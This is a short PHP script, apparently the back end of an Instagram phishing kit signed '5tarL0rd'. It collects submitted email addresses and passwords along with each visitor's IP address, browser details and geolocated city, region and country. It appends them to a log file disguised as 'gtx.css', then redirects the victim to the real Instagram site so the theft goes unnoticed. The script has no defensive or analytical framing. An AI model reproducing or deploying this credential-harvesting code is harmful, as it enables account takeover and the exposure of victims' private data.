5tarl0rd
<?php
$myfile = fopen("gtx.css", "a+") or die("Unable to open file!");
$txt = $_POST["email"];
$txt1 = $_POST["pass"];
$ip = $_SERVER['REMOTE_ADDR'];
$ip1 = getenv['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$loc = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip1));
$city = @$loc->geoplugin_city;
$state= @$loc->geoplugin_regionName;
$country= @$loc->geoplugin_countryName;
fwrite($myfile,"Email:".$txt.","."Password:".$txt1."\r\n"."Visitor IP address:".$ip.";"."Browser Info:".$user_agent."\r\n"."City:".$city.";"."Region Name:".$state.";"."Country:".$country."\r\n");
fclose($myfile);
header("Location:https://www.instagram.com");
?>
5tarL0rd By